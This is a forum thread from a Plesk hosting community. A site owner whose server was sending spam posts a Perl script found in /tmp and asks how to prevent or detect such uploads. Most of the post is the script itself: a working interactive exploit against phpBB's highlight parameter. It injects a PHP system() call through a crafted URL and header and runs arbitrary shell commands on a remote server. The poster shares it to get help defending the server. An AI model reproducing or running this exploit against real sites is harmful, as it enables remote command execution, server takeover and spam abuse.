1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice
  2. Dear Pleskians, please read this carefully! New attachments and other rules Thank you!
    Dismiss Notice
  3. Dear Pleskians, I really hope that you will share your opinion in this Special topic for chatter about Plesk in the Clouds. Thank you!
    Dismiss Notice

perl script uploaded to site

Discussion in 'Plesk for Linux - 8.x and Older' started by ElricM, Jul 3, 2005.

  1. ElricM

    ElricM Guest

    0
     
    Two days ago, my site became super sluggish, I was configuring apache and got an error there no no available sockets, then I noticed I had almost 400,000 spam messages in the mail queue. So I rebooted the system, stopped the queue and deleted all the messages with qmail-remove. Today I found this in the /tmp directory:

    /tmp/outlaw/trash4.pl
    Code:
    use strict;
    use IO::Socket;
    
    unless ($ARGV[0]) { print "$0 <viewtopic url>\n"; exit(1); }
    
    $ARGV[0] =~ m![url]http://[/url](.*?)/(.*?t=\d+)!;
    my ($server, $port) = split (/:/,$1);
    $port   = 80 unless defined($port);
    $server  = $1 unless defined($server);
    my ($url, $command) = $2;
    
    print "$server - $port - $url\n";
    
    while () {
    		print "trash4> ";
    		while(<STDIN>) {
    				$command=$_;
    				chomp($command);
    				last;
    		}
    		&send($command);
    }
    
    sub send {
        my $ok	=	0;
        my $cmd	= "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\"";
        my $string  = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1\n".
    					"Host: $server\nPHP: $cmd\n\n\n\n";
        my $socket = IO::Socket::INET->new(PeerAddr => $server,
    				PeerPort => $port,
    				Proto    => "tcp",
    				Type     => SOCK_STREAM)
    				or die "can't connect to: $server : $@\n";
    	print $socket $string;
    	while(<$socket>) {
    		if (/#PHPBBEXPLOIT#/) {
    				close($socket) and last if $ok eq 2;
    				$ok++;
    				next;
    		}
    		print if $ok eq "1";
    	}
    }
    exit 0;
    
    How do you prevent/detect stuff like this from being uploaded and executed?
     
  2. EvolutionCrazy

    EvolutionCrazy Basic Pleskian

    23
    90%
    Joined:
    Jun 4, 2005
    Messages:
    65
    Likes Received:
    0
  3. ElricM

    ElricM Guest

    0
     
    Thanks a bunch. Very helpful
     
Loading...